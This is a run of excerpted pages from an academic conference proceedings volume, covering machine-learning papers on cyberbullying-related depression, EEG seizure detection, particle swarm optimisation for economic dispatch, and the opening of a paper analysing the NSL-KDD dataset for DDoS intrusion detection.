872 A. Kumar and N. Sachdeva
class distributions in the training data by over-sampling the minority class or under-
sampling the majority class. So, in order to handle the data skewness, we incorporate
the use of ‘RandomOverSampler (ROS).’
Figure 1 shows the word cloud built from the collected data.
The system architecture is shown in Fig. 2. First phase was data collection and
preprocessing. Next was feature selection which was carried out using TF-IDF [3, 5]
and Word2Vec [13] for creating word feature vector which was then fed to supervised
machine learning techniques [14, 15] (SVM, NB, RF, MLP) and GloVe [4] being
used for RNN and CNN [4, 16–20] for further classification. Here, 80% of the data
was used for training and rest 20% was used for testing.
In this section, we present the comparative result analysis for CB detection using
precision (P), accuracy (A), and recall (R) [5] (all expressed in percentages). All
experiments were performed using tenfold cross-validation.
Table 1 shows the results obtained where RF yielded highest A of around 93.4%.
Next comes NB, followed by MLP. Lowest A was obtained using SVM.
Cyberbullying-Mediated Depression Detection … 873
Table 2 shows the results obtained where similar observation has been reported
where RF yielded the highest A of around 90.36%. Next comes NB, followed by
MLP. Lowest A was obtained using SVM. Hence, we could infer that enhanced
prediction A was obtained using TF-IDF in comparison to Word2Vec.
Among all, the results of RF with ROS demonstrated the best performance in
binary classification with class imbalance distribution. Feature generation with ROS
at preprocessing stage has proven to be the effectual way for handling class imbalance.
874 A. Kumar and N. Sachdeva
Table 3 shows the results obtained by applying (ROS by pretraining) RNN, CNN,
and Conv-RNN (hybrid) using GloVe [4].
From Table 3, it is observed that the hybrid Conv-RNN yielded highest accuracy
of around 96%. Next comes CNN (95%) followed by RNN (94%). Among all the
applied classical ML techniques, highest accuracy was reported with RF for binary
classification. Our findings also showed that the DL-based techniques outperformed
the ML techniques previously applied to the same dataset for CBMD detection and
N-CBMD detection (as depicted in Fig. 3).
5 Conclusion
Mental distress is a sensitive field that has attracted the attention of practitioners and
researchers for the decades. In this research, we performed a comparative analysis
Cyberbullying-Mediated Depression Detection … 875
of machine learning and deep learning techniques on the synthetic dataset collected
from Twitter and Reddit that focused primarily on mentally depressed tweets and
posts. From this dataset, we identified the samples by manual annotation that were
depressive owing to CB victimization and the other category being the samples
that were depressive due to any other reason (binary classification: CBMD and N-
CBMD). The resultant dataset was thus quite imbalanced. We employed the use of
random over sampling with feature generation at preprocessing step that seemed to
be the methodical technique for handling class imbalance in binary classification. We
then applied various ML and DL techniques on the comprised dataset and obtained
encouraging results. From the results obtained, we can conclude that DL produce
higher accuracy in comparison to baseline supervised ML techniques for observing
signs of depression (mental distress) caused due to online bullying. Also, from the
dataset distribution, we can also observe that though CB is not the major cause of
mental illness but indeed it is one of the most prominent reasons for mental depression
on SM.
6 Future Trends
This work will be beneficial for netizens who often use social networking sites
and are susceptible to mental illnesses. This problem is omnipresent but if we talk
particularly for countries like India where having and discussing any mental distress
is considered as a taboo, the condition is still bad. Here, people do not discuss their
mental state and they are not willing to take any help from professionals. There
is also a situation when people are not even able to understand and accept their
mental illness as well. Thus, an implicit method for automatic detection is the need
of the hour that will aid in the heedful observation of the indications of mental
distress among the people using social networking sites. Following the same lines,
we intend to make a robust real-time method that can help netizens in identifying
and analyzing their depressed state of mind due to CB in an efficient way. This work
could be augmented by implementing it for any Android systems (like apps that
could be used in mobiles, tabs, etc.) which could further be connected to doctors and
professionals in the relevant field. This would eventually help depressed individuals
in discussing their state of mind, mental health problems, and other issues they have
faced due to CB. This application would be more useful if made available to the
general public. Also, these can be further exploited for testing other domains such as
anxiety disorder detection. Also, other soft computing models (such as hierarchical
attention networks and feature optimizations) could also be applied for further testing
and analysis.
876 A. Kumar and N. Sachdeva
References
17. Kumar, A., & Jaiswal, A. (2020). A deep swarm-optimized model for leveraging industrial data
analytics in cognitive manufacturing. IEEE Transactions on Industrial Informatics. https://doi.
org/10.1109/TII.2020.3005532
18. Kumar, A., Jaiswal, A., Garg, S., Verma, S., & Kumar, S. (2019). Sentiment analysis using
cuckoo search for optimized feature selection on Kaggle tweets. International Journal of
Information Retrieval Research (IJIRR), 9(1), 1–15.
19. Kumar, A., & Garg, G. (2019). Sentiment analysis of multimodal twitter data. Multimedia Tools
and Applications, 78(17), 24103–24119.
20. Kumar, A., & Sachdeva, N. (2021). Multimodal cyberbullying detection using capsule network
with dynamic routing and deep convolutional neural network. Multimedia Systems, 1–10.
Improved Patient-Independent Seizure
Detection System Using Novel Feature
Extraction Techniques
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 879
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_71
880 D. Nandini et al.
1 Introduction
Epilepsy is a neurological disease which severely impacts the lives of many patients.
At present, 65 million people worldwide are affected by this disease. An epileptic
seizure results in abnormal sensations that may range from the twitching of arms
to severe injuries and may even lead to death after strokes. Significant research
is carried out to detect epilepsy detect using electroencephalogram (EEG) signals.
Sriraam and Raghu [1] utilized the Bern-Barcelona EEG database to identify focal
and non-focal seizures. EEG signals are segmented in the window of 10 s duration.
The authors pre-processed the signal using a fourth-order Butterworth band-pass filter
in the frequency range of 0.5–150 Hz. The features extraction in time and frequency
domain are carried out along with information theory and statistical-based features.
The SVM classification algorithm achieves the highest sensitivity, specificity, and
classification accuracy. A real-time microcontroller-based prototype is employed by
Satarupa et al. [2]. Low-power consumption, quick and accurate seizure detection,
and easy software compatibility are the few attributes of the proposed prototype. The
EEG signals are pre-processed using LPF and features are extracted using a discrete
wavelet transform (DWT). Daubechies, Symlet, Bi-orthogonal, and Coiflet mother
wavelets are employed for multi-resolution analysis of the signals. Results reveal
high-classification accuracy using the ANN classifier. Zabihi et al. [3] presented a
patient-dependent approach employing a two-layer classification to detect seizures
using linear discriminant analysis and artificial neural network. Selvakumari et al.
[10] carried out their work on 12 channels placed in parietal and occipital lobes. The
work presented by them is a patient-dependent and obtains an accuracy of 95.63%.
Correa et al. [4] developed an algorithm for real-time and offline modes, based on
adaptive filters, signal averaging, and thresholds for seizure detection. Sadeghzadeh
et al. [5] introduced a two-level patient-dependent approach for seizure detection,
using three-level feature extractions from the pre-ictal stage of the EEG signal. These
signals are matched with the pre-defined threshold value to conclude the likelihood of
seizure occurrence. Fasil et al. [6] removed the unwanted noise from the EEG signals
using the butterworth filter, differential decomposition methods are used for signal
decomposition, then log-entropy and signal energy are extracted. An accuracy of 86%
with the SVM algorithm is obtained by the authors. Raghu et al. [7] presented a study
of the dynamic characteristics of EEG signals. The authors applied a modified version
of DWT, maximal overlap discrete wavelet transform to analyse EEG signals. The
highest obtained classification accuracy for CHB-MIT is 94.51%. Raghu and Sriraam
[8] extracted features in time as well as frequency domain. The SVM classifier
yields good results with an accuracy of 96.1%. Yang et al. [9] developed a novel
patient-independent seizure detection method and patient-dependent analysis is also
performed. Results reveal better classification accuracy for patient-dependent [10]
study, but it is difficult to apply to new patients.
The medical experts diagnose epilepsy by visually analyzing and inspecting the
EEG recordings. The manual process of analyzing the signal is time-consuming,
tedious, and susceptible to human error [9] due to the rise of 5 million epileptic
Improved Patient-Independent Seizure Detection … 881
patients per year. These issues may be effectively resolved using efficient feature
extraction and machine learning-based classification techniques. Further scalp EEG
measures the brain activities from the surface of the brain in a more easy, reliable,
and affordable way as compared to invasive EEG records. Therefore in this work, the
non-invasive CHB MIT scalp EEG dataset is used to design a patient-independent
epileptic seizure detection model. The two novel patient-independent segment-based
time-domain feature extraction techniques, i.e., “Min–Max” and “Variation” methods
are proposed. The feature extraction techniques are designed by considering the ictal
and interictal stages of a seizure. Various ML techniques are considered to classify
the signals as seizure or non-seizure category. A performance comparison of the
results obtained using various ML algorithms is also performed in this study. It is
observed that the results obtained using the proposed novel techniques are better in
comparison to the conventional methods. Further the performance of the proposed
epilepsy detection system is analyzed using various performance metrics.
The organization of this paper is given as follows: Section 2 explains the
suggested methodology of feature extraction and classification. Section 3 repre-
sents the obtained results and discussion of this work. Lastly, Sect. 4 presents the
conclusion of this work.
2 Methodology
The epileptic seizure detection system suggested in this research work comprises
signal acquisition, pre-processing, feature extraction and selection, and classification
stages. Figure 1 illustrates the schematic illustration of the epilepsy detection model.
The publicly available CHB MIT dataset consisting of scalp EEG recordings
from 22 subjects is considered for experimentation. The database is collected from 5
males and 17 females in the age group of 3–22 years and 1.5–19 years, respectively.
The recording of the scalp EEG is done using the international 10–20 electrode
position standards. The pre-processing of data involves the removal of unwanted
signal, power-line noise, and artifacts from the EEG signal. The CHB-MIT scalp
EEG data is pre-processed using the 4th-order Butterworth band-pass filter in the
frequency band of 0.5–32 Hz. This study includes all the channels except the duplicate
EEG channel “T8-P8.” The EEG signal is segmented into small bits by applying a
non-overlapping sliding window of 6 s duration each [9]. The recordings for patients
12 and 16 are excluded in this study, owing to their short interictal and ictal regions.
The seizure regions are characterized by oscillatory patterns, sharp spikes, and a
rapid sequence of the fast action potential in the EEG signal. These characteristics
are used to design an epileptic seizure detection model. In this work, the EEG scalp
database is used to extract “Max–min” and ‘Variation’ based features. These feature
sets are derived using segment-based approaches [9, 10]. The operation involves
the study of epileptiform activity for seizure analysis. The ictal and interictal signal
segments are considered in the analysis. The ictal regions are the regions associated
with the occurrence of seizure attacks. The region in the EEG signal that occurs
between the seizures is known as the interictal region.
The Max–Min method is a variant of the method proposed by Yang et al. [9]. However
this method focuses on extracting the maximum and minimum values from the ictal
and interictal regions. The Max–Min procedure for feature extraction is given as
follows:
1. The ictal and the interictal region are divided into smaller windows using a
non-overlapping window of 6 s each in duration.
2. The maximum (pi ) and minimum (qi ) values corresponding to each 6 s region
for all channels are retrieved and stored as multiple pairs of maximum and
minimum values corresponding to the ictal and interictal region.
3. A one-dimensional array (pqabs ) is created that gives the absolute difference
between the maximum and minimum values.
pqabs = [| p1 − q1 |, | p2 − q2 |, | p3 − q3 | · · · | pi − qi |] (1)
This method is an extension of the Max–Min method and uses the maximum (pi )
and minimum (qi ) values corresponding to ictal and interictal regions. The mean of
the maximum values corresponding to the ictal and interictal regions is subtracted
from all maximum and minimum values. This method provides the information about
average maximum and minimum value for the seizure and non-seizure region and the
difference between mean value and ictal and interictal regions. Total 76,111 voltage
values are calculated for all the subjects.
k
meanictal = pi (2)
i=0
k
meaninter = qi (3)
i=0
2.3 Classification
model is created by learning simple decision rules. It has low model complexity and
fast running speed [9]. Scalable tree Boosting algorithm (XGB) is the faster running
version of gradient boosting decision tree algorithm. The performance of the ML
classifiers is evaluated using the confusion matrix. Further the performance evalua-
tion of ML algorithms is carried out using accuracy, Mathew’s correlation coefficient
(MCC), sensitivity, Cohen’s Kappa metric, and specificity [9].
The Max–Min method extracts the maximum and minimum values from the ictal
and interictal region of the CHB MIT EEG dataset. Then, the absolute difference
between the maximum and the minimum values is evaluated. Finally, the minimum,
maximum, mean, standard deviation, and variance values corresponding to all the
channels are calculated. For example there are 7 seizure files and 35 non-seizure
files for subject chb01. The duration of the seizure files is taken as reference and the
duration of the interictal region is chosen randomly such that it matches the duration
of the ictal region. The duration of each ictal and interictal region is divided into a
non-overlapping window of 6 s each. So, the duration for seizure for the chb01_03.edf
file is 40 s. Thus, a pair of 22 × (40/6) = 154 maximum and minimum voltage values
corresponding to file 1 are obtained. Similarly, the voltage values corresponding to all
the EEG channels are calculated, resulting in a total of 38,044 pairs of voltage values.
Figure 2 graphically illustrates the proposed Max–Min feature extraction method.
The performance of the ML classifier using the Max–Min method is depicted in
Fig. 3. The graph shows that the highest accuracy of 97.82% is achieved using the
decision tree classifier.
Figure 4 graphically illustrates the concept of feature extraction using the variation
method. The variation method works on the principle similar to Max–Min method. In
this, the mean maximum values are calculated corresponding to the ictal and interictal
regions. Later, the absolute difference between the maximum value and mean value
is calculated. Similarly, the absolute difference between the minimum and mean
886 D. Nandini et al.
Fig. 3 Seizure detection performance comparison of machine learning algorithm using max–min
method
Fig. 5 Seizure detection performance comparison of machine learning algorithm the variation
method
Table 2 Comparative analysis of the performance metrics for the proposed seizure detection model
Performance ML Accuracy Sensitivity Specificity MCC (%) Kappa (%)
parameters algorithm (%) (%) (%)
Max–min Dtree 97.82 97.86 97.86 95.91 95.91
method
Variation XGB 92.40 95.03 95.03 85.02 84.90
method
4 Conclusions
using the XGB algorithm. Thus, min–max and variation methods achieve the classi-
fication accuracy of 11.55 and 2.52% greater than the methods discussed by [2, 9],
respectively. It is also revealed that the suggested methods use less than 5 features
thus reducing the data dimension to a large extent. In future, other stages of seizures
may be classified with the help of integrated feature sets and various feature selection
and channel selection methods.
References
1. Sriraam, N., & Raghu, S. (2017). Classification of focal and non focal epileptic seizures using
multi-features and SVM classifier. Journal of Medical Systems, 41(10), 1–14.
2. Chakrabarti, S., Swetapadma, A., Ranjan, A., & Pattnaik, P. K. (2020). Time domain imple-
mentation of pediatric epileptic seizure detection system for enhancing the performance of
detection and easy monitoring of pediatric patients. Biomedical Signal Processing and Control,
59, 101930.
3. Zabihi, M., Kiranyaz, S., Jäntti, V., Lipping, T., & Gabbouj, M. (2019). Patient-specific seizure
detection using nonlinear dynamics and nullclines. IEEE Journal of Biomedical and Health
Informatics, 24(2), 543–555.
4. Correa, A. G., Orosco, L. L., Diez, P., & Leber, E. L. (2019). Adaptive filtering for epileptic
event detection in the EEG. Journal of Medical and Biological Engineering, 39(6), 912–918.
5. Sadeghzadeh, H., Hosseini-Nejad, H., & Salehi, S. (2019). Real-time epileptic seizure predic-
tion based on online monitoring of pre-ictal features. Medical and Biological Engineering and
Computing, 57(11), 2461–2469.
6. Fasil, O. K., Rajesh, R., & Thasleema, T. M. (2018). Fusion of signal and differential signal
domain features for epilepsy identification in electroencephalogram signals. In Advances in
data and information sciences (pp. 127–135). Springer.
7. Raghu, S., Sriraam, N., Temel, Y., Rao, S. V., Hegde, A. S., & Kubben, P. L. (2019). Performance
evaluation of DWT based sigmoid entropy in time and frequency domains for automated
detection of epileptic seizures using SVM classifier. Computers in Biology and Medicine, 110,
127–143.
8. Raghu, S., & Sriraam, N. (2018). Classification of focal and non-focal EEG signals using
neighborhood component analysis and machine learning algorithms. Expert Systems with
Applications, 113, 18–32.
9. Yang, S., Li, B., Zhang, Y., Duan, M., Liu, S., Zhang, Y., Feng, X., Tan, R., Huang, L., & Zhou,
F. (2020). Selection of features for patient-independent detection of seizure events using scalp
EEG signals. Computers in Biology and Medicine, 119, 103671.
10. Selvakumari, R. S., Mahalakshmi, M., & Prashalee, P. (2019). Patient-specific seizure detection
method using hybrid classifier with optimized electrodes. Journal of Medical Systems, 43(5),
1–7.
Solution to Economic Dispatch Problem
Using Modified PSO Algorithm
Abstract This research paper proposes a novel approach which is the extension
of the PSO algorithm aims at solving the economic dispatch problem. Economic
dispatch problem needs to be overcome by minimizing fuel cost which comes from
the generating units. Several constraints have been incorporated in the calculation
of the overall operating cost of power system operation. From the economic point
of view, it has been a matter of concern for most of the companies and needs to be
solved.
1 Introduction
A power system has quite a lot of power plants. Each power plant has several gener-
ating units [1]. Daily load patterns show signs of acute deviation amid the rush and
off-rush hours for the reason that the community utilizes a smaller amount of elec-
trical energy on Saturday than on weekdays, and at a lower rate between midnight
and early morning than during the day. If adequate generation to fulfill the rush is
kept online all through the day, it is promising that few of the units will be working
near their least generating threshold during the off rush period. In most of the unified
power systems, the power prerequisite primarily fulfills by thermal power genera-
tion. Quite a lot of working approaches are achievable to fulfill the requisite power
requirement. It is recommended to use the most favorable operating approach based
on the financial measure. That is to say significant, the decisive factor in power system
functioning is to meet the power demand at least fuel cost. Furthermore, sequentially
to provide first-rate electrical energy to consumers in a protected and cost-effective
method, economic dispatch is measured to be one of the best existing alternatives.
The major outcomes of the research are given as follows:
• This research aimed at solving the economic dispatch problem.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 889
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_72
890 A. Singh and A. Khamparia
2 Unit Commitment
For regular system operations, the actual power output of each unit is between its
upper and lower limits as follows (Eq. 2):
Equilibrium is reached when the net electricity generation is equal to the overall
demand and the actual power loss in transmission lines (Eq. 3):
n
Pi = D + Pl (3)
i=1
Solution to Economic Dispatch Problem Using Modified … 891
The operational range of online generators is constrained by their limits on ramp rate
[6]. Three potential scenarios occur while the generator units are online.
• The generating unit operates in a steady state.
• The generating unit increases its generation of power.
• The generating unit decreases its generation of power.
As generation increases (Eq. 4),
Economic dispatch problem deal with discovering the extent of power each gener-
ating unit should produce for given power demand, with the condition of reduction
in aggregate operational cost [7–11] (Eq. 6).
FT = F1 + F2 + F3 + · · · + FN
N
= Fi Pi
i=1
N
φ = 0 = Ploss + Pload − Pi (6)
i=1
n
min F = ai + bi Pi + ci Pi2 (7)
T
i=1
Here F T denotes overall fuel cost. F i (Pi ) denotes the cost of ith generating unit
in $/hr. Pi denotes ith unit’s power in MW, n denotes aggregate of generating units.
Lastly, a, b and c are generating unit’s cost coefficients.
892 A. Singh and A. Khamparia
Particle swarm optimization or PSO is motivated by the social behavior of birds [12,
13]. PSO is a very simple algorithm. However, it is a powerful algorithm too. Two
principles are used behind the functioning of PSO which are communication which
is informing the measure to the other party plus learning. The algorithm aims at
finding a global minimum. The working of standard PSO is shown in Fig. 1.
5 Proposed Approach
Nested PSO is a PSO subgroup that resolves two or more issues concurrently [14–
17]. In the algorithm here, two PSOs are combined or nested to solve simultaneously
associated concerns. There is an outer and an inner PSO working together here. The
advantage is that when achieving another one, it is easy to achieve two objectives
by considering another goal. The working of the proposed methodology is shown in
Fig. 2.
PSO tried to obtain ED-generating answers in each iteration. To meet the system
demand and realistic operating constraints of generating units that include ramp up
and down rate limits and prohibited operating zones, economic dispatch planning
must conduct the optimized dispatch between the operating generating units as stated
in Table 1.
Solution to Economic Dispatch Problem Using Modified … 893
ratio (wdamp), coefficient of personal learning, coefficient of global learning (c1 and
c2 ) and constriction coefficients (phi1 and phi2).
The loss coefficients can be defined with matrix B as follows.
⎡ ⎤
0.0017 0.0012 0.0007 −0.0001 −0.0005 −0.0002
⎢ 0.0012 0.0014 0.0009 0.0001 −0.0006 −0.0001 ⎥
⎢ ⎥
⎢ ⎥
⎢ 0.0007 0.0009 0.0031 0.0000 −0.0010 −0.0006 ⎥
⎢ ⎥
⎢ −0.0001 0.0001 0.0000 0.0024 −0.0006 −0.0008 ⎥
⎢ ⎥
⎣ −0.0005 −0.0006 −0.0010 −0.0006 0.0129 −0.0002 ⎦
−0.0002 −0.0001 −0.0006 −0.0008 −0.0002 0.0150
6 Results
Figure 3 shows the external iteration for optimizing cost. Figure 4 shows the total
decrease in cost. The proposed technique has considered the ten iterations as the
external iterations and sub iteration further consist of hundred iterations. The opti-
mized cost turned out to be 197,320$. The implementation has been done using
MATLAB with Intel Core i5 of 3.4 GHz and 4 gigabytes RAM configuration.
7 Conclusion
In this paper, modified PSO is utilized to work out the economic dispatch (ED)
problem. The proposed technique has been taken into account various constraints
include ramp up and down costs and other constraints. The proposed technique has
given promising results.
896 A. Singh and A. Khamparia
References
1. Wood, A. J., & Wollenberg, B. F. (2007). Power generation, operation and control (2nd ed).
Wiley.
2. Yu, X., Zhang, X. (2014). Unit commitment using Lagrangian relaxation and particle swarm
optimization. International Journal of Electrical Power and Energy Systems
3. Singh, A., & Kumar, S. (2016). Differential evolution: An overview. Advances in Intelligent
Systems and Computing. https://doi.org/10.1007/978-981-10-0448-3_17
4. Anand, H., Narang, N., & Dhillon, J. S. (2018). Profit based unit commitment using hybrid
optimization technique. Energy. https://doi.org/10.1016/j.energy.2018.01.138
5. Singh, A., & Khamparia, A. (2020). A hybrid whale optimization-differential evolution and
genetic algorithm based approach to solve unit commitment scheduling problem: WODEGA.
Sustainable Computing: Informatics and Systems. https://doi.org/10.1016/j.suscom.2020.
100442
6. Deka, D., & Datta, D. (2019). Optimization of unit commitment problem with ramp-rate
constraint and wrap-around scheduling. Electric Power Systems Research. https://doi.org/10.
1016/j.epsr.2019.105948
7. Xin-gang, Z., Ze-qi, Z., Yi-min, X., & Jin, M. (2020). Economic-environmental dispatch of
microgrid based on improved quantum particle swarm optimization. Energy. https://doi.org/
10.1016/j.energy.2020.117014
8. Wang, Q.-G., Ming, Yu., & Liu, J. (2020). An integrated solution for optimal generation oper-
ation efficiency through dynamic economic dispatch. Materials Today: Proceedings. https://
doi.org/10.1016/j.matpr.2020.03.535
9. Chen, Xu., Li, K., Bin, Xu., & Yang, Z. (2020). Biogeography-based learning particle swarm
optimization for combined heat and power economic dispatch problem. Knowledge-Based
Systems. https://doi.org/10.1016/j.knosys.2020.106463
10. Hailiang, Xu., Meng, Z., & Wang, Y. (2020). Economic dispatching of microgrid considering
renewable energy uncertainty and demand side response. Energy Reports. https://doi.org/10.
1016/j.egyr.2020.11.261
11. Goudarzi, A., Li, Y., & Xiang, Ji. (2020). A hybrid non-linear time-varying double-weighted
particle swarm optimization for solving non-convex combined environmental economic
dispatch problem. Applied Soft Computing. https://doi.org/10.1016/j.asoc.2019.105894
12. Kennedy, J., & Eberhart, R. (1995). Particle swarm optimization. In Proceedings of ICNN’95—
International Conference on Neural Networks, Perth, WA, Australia. https://doi.org/10.1109/
ICNN.1995.488968
13. Shi, Y., & Eberhart, R. (1998). A modified particle swarm optimizer. In 1998 IEEE Inter-
national Conference on Evolutionary Computation Proceedings. IEEE World Congress on
Computational Intelligence. https://doi.org/10.1109/ICEC.1998.699146
14. Eberhart, R. C., Groves, D. J., & Woodward, J. K. (2017). Deep swarm: Nested particle swarm
optimization. In 2017 IEEE Symposium Series on Computational Intelligence (SSCI), Honolulu,
HI. https://doi.org/10.1109/SSCI.2017.8280920
15. Adedeji, P. A., Akinlabi, S., Madushele, N., & Olatunji, O. O. (2020). Wind turbine power output
very short-term forecast: A comparative study of data clustering techniques in a PSO-ANFIS
model. Journal of Cleaner Production. https://doi.org/10.1016/j.jclepro.2020.120135
16. Zhang, X., Lin, Q., Mao, W., Liu, S., Dou, Z., & Liu, G. (2020). Hybrid particle Swarm and
Grey Wolf Optimizer and its application to clustering optimization. Applied Soft Computing.
https://doi.org/10.1016/j.asoc.2020.107061
17. Faisal, M., Hannan, M. A., Ker, P. J., Abd. Rahman, M. S., Begum, R. A., & Mahlia, T. M. I
(2020). Particle swarm optimised fuzzy controller for charging–discharging and scheduling of
battery energy storage system in MG applications. Energy Reports. https://doi.org/10.1016/j.
egyr.2020.12.007
Recommendations for DDOS
Attack-Based Intrusion Detection System
Through Data Analysis
Abstract As internet usage is increasing as the days are passing on, it is essential to
secure the network from intruders. So, it indicates the necessity of the construction
of an intrusion detection system. But one must know on which basis the intrusion
detection system (IDS) needs to be built. This thought dragged us to generate a new
idea of forming the recommendations which can act as a basis for the development of
IDS. In this paper, we have provided the recommendation by analyzing the standard
datasets, KDD, and NSL-KDD. For the analysis purpose, MS-Excel was utilized.
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 899
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_73
900 S. Pande et al.
along with TCP. The full form of UDP is user datagram protocol which is considered
as a substitute for TCP in terms of communication protocol. This protocol majorly
concentrates on packet loss tolerance and low-latency linking among the various
applications. The full form of ICMP protocol is Internet control message protocol
which indeed a strengthening protocol of the IP suite. It is used to generate the
success or error report on the operational data when communicating two parties
through network devices such as routers.
The major contributions of the proposed framework deal with.
• Analyzing the various datasets such as KDD and NSL-KDD.
• Identifying the importance of NSL-KDD when compared with another mentioned
dataset.
• Analyzing the NSL-KDD thereby generating the recommendations which will be
helpful for further research.
The paper is organized into various sections such as Sect. 2 discusses the related
work based on the intrusion detection system and threats. Section 3 discusses the
analysis obtained from the considered dataset and thereby recommendations based
on that analysis. Section 4 discusses the conclusion related to DOS threats and normal
activities of the network.
2 Related Work
Ruan et al. [1] implemented the visualization of the popular data; KDD in the scenario
of the issues affected while analyzing big data with various characteristics of big data
such as volume, variety, and velocity. The sampling methodology, tabular weights,
and hash methodology were adopted to look in the depths of this dataset to recognize
the cluster with normal and other clusters with their corresponding attacks. Ji et al. [2]
identified the essentiality of IDS for the securitization of the user’s network. So, the
proposed work to classify the various attacks in IDS using the datasets such as KDD
and NSL-KDD with the aid of an artificial neural network. Through this proposed
work, able to achieve the accuracy overall but failed to achieve good accuracy while
classifying the various categories of attacks. Ibrahimi and Ouaddane [3] pointed out
the importance of IDS and also recognized that the major research was related to
machine learning held on the data collected through IDS to categorize the various
attacks in the dataset along with the category normal. The proposed framework was
held on the popular methodologies that are used for size reduction of big data such
as Linear Discriminant Analysis and Principle Component Analysis to identify the
anomalies that exist in the dataset NSL-KDD so that it will improve the conditions
to classify the various attacks. Othman et al. [4] have observed that the data collected
through IDS increasing in size as well as the number of features that gave an idea
to utilize the big data framework for classifying the various attacks. The proposed
framework utilized the spark framework as a big data framework, chi-square-selector
utilized for the selection of vital features from the big data, and a support vector
902 S. Pande et al.
machine utilized for the classification of attacks. The complete proposed framework
was based on the KDD dataset. Training time and time of prediction are very less in
the case of the proposed framework when compared to only the SVM framework or
only the logistic regression framework.
Jia et al. [5] proposed a framework based on a customized deep neural network
utilized to classify various attacks based on the datasets such as KDD and NSL-KDD
which are obtained through IDS. The customized deep neural network was framed
with four hidden-layers and though this framework was able to achieve an accuracy
of 99.9%. This article claims that this customized neural network can be used along
with IDS to improve the security of the network. Anand Sukumar et al. [6] proposed
a framework for the identification of the kind of attack through IDS with the aid
of a combination of genetic algorithm and K-Means methodology. It was imple-
mented on the dataset KDD99. Yet, the accuracy attained by the proposed model
is minimal and already there exist better models than this model. Basnet et al. [7]
explored the potential and efficiency of the deep learning methodology for the iden-
tification and classification of kinds of intrusion. It was implemented with the aid of
dataset, CSE-CIC-IDS2018, and able to achieve an accuracy of 99%. Kumar et al. [8]
proposed a unified model based on machine learning to integrate the IDS and IoT. The
inspiration for this proposed methodology by the identification that internet usage
affecting the devices communicating with the wireless network affects susceptibility
for various security attacks. This framework was implemented using the dataset
UNSW-NB15 and the proposed model had better accuracy attained with the other
two approaches such as ENADS and DENDRON. Khonde and Ulagamuthalvi [9]
mainly focused on the reduction of the number of features available in the standard
dataset, KDD99, and then the obtained data used for the classification of various
types of attacks. The classification was implemented using random forest method-
ology attained about 95% accuracy. Pawlicki et al. [10] discussed the potential to
degrade the efficiency by generating adverse attacks using four of the newly proposed
procedures, of an improved IDS during the testing phase, and provides a way of
detecting these threats. Both ANN and four approaches to render adverse attacks are
presented with the necessary context. The recent detection system is comprehensive
as well as the obtained findings were compared in five various classifiers. To the
utmost understanding, IDSs have not yet thoroughly studied the identification of
detrimental threats on ANN.
Ji and Li [11] suggested an IDS system based on the deep neural network with
the combination of FM methodology. It was implemented on the dataset KDD99 and
the accuracy attained through this framework about 93.4%. Su et al. [12] proposed
a deep learning-based IDS for the detection of various attacks on the network with
enhanced accuracy called BAT. This model is a combination of two mechanisms
such as bidirectional long short-term memory and attention mechanism which will
attain the vital attributes for the categorization of network traffic. Besides, attached
more convolutional layers for sample data processing with SoftMax activation func-
tion to attain the successful classification. This model enhanced the effectiveness of
recognizing anomalies that exist in the network. The dataset utilized was NSL-KDD
Recommendations for DDOS Attack-Based Intrusion … 903
for the implementation of the proposed model. Abrar et al. [13] compared the perfor-
mance of identification of threats in the network through various machine learning
methodologies based on the dataset NSL-KDD. Instead of using a complete dataset,
four sample datasets were derived from the main dataset and that was utilized for
the comparison aspects. Before deriving the various sample data, preprocessing was
applied for discarding the unnecessary features from the NSL-KDD. The proposed
work can be concluded that the random forest, extra tree classifier, and decision tree
methodologies are performing better than other machine learning methodologies.
Gao et al. [14] researched to generate an ensemble technique using machine learning
methodologies. The attained accuracy is promising but not at a good level. Through
this work, the authors gave a thought of going with ensembling methodologies was
appreciable. In this aspect, there is a high necessity for proper preprocessing as well as
attributes selection optimization of data. The proposed framework was implemented
through the NSL-KDD dataset. Aljawarneh et al. [15] implemented a proposed hybrid
model for classifying the threats in two different forms such as binary and multi-class
classification. Through the hybrid model able to attain an accuracy of 99.81% for the
binary classification and an accuracy of 98.56% for the multi-class classification. It
was implemented on the NSL-KDD dataset. The proposed model has two sections,
the first section deals with the filtering of attributes, and the second section deals
with the combination of various classifiers that would help classify the threats in the
network. Bhattacharjee et al. [16] employed an IDS model with a mixture of fuzzy
membership function was applied on the vectorized objective function along with a
genetic algorithm for the categorization of threats that exist in the network [17]. It
was implemented on the NSL-KDD dataset.
From the above discussion, one can understand that active research on the various
intrusion detection systems by classifying the various threats that exist in the network
is widely going on. Classification of these researches can be filtered using various
methodologies based on machine learning and deep learning methodologies [18].
The popular datasets utilized for this scenario are KDD and NSL-KDD. Still, there
is a necessity for the identification of a strong basis for the development of intrusion
detection systems [19]. For such a scenario, it is necessary to identify certain recom-
mendations based on the various threats, protocols, services, and flags. This aspect
is considered for the proposed framework.
3 Analysis
This section is organized into two subsections—the first subsection deals with the
discussion of the dataset and the analysis based on the dataset the second subsection
deals with the necessary recommendation to be produced based on the analysis made
on the considered dataset.
904 S. Pande et al.
The dataset considered is the NSL-KDD dataset which is one of the popular datasets
while dealing with intrusion detection systems. That is the main reason to consider
this dataset and analyze the scenario of DDOS threat concerning various protocols
and its distribution concerning normal activities. This dataset consists of 42 features
developed based on 41 features such as protocol, threat, flag, duration, etc. The attacks
mentioned in this dataset can also be categorized into DDOS threat, Probe threat,
R2L (Root to Local) threat, U2R (User to Root) threat, and normal activities. The
analysis is done utilizing Office 365-MS Excel with the operating system Windows
10.
There are about two datasets that we have considered in this work and those
datasets are KDD and NSL-KDD. Again, NSL-KDD are extracted from the KDD
dataset. NSL-KDD dataset is extracted from KDD dataset about 20% of the entire
KDD dataset. NSL-KDD dataset was considered in terms of DDOS threats as well
as normal activities for analysis purpose. The DDOS class consists of various sub-
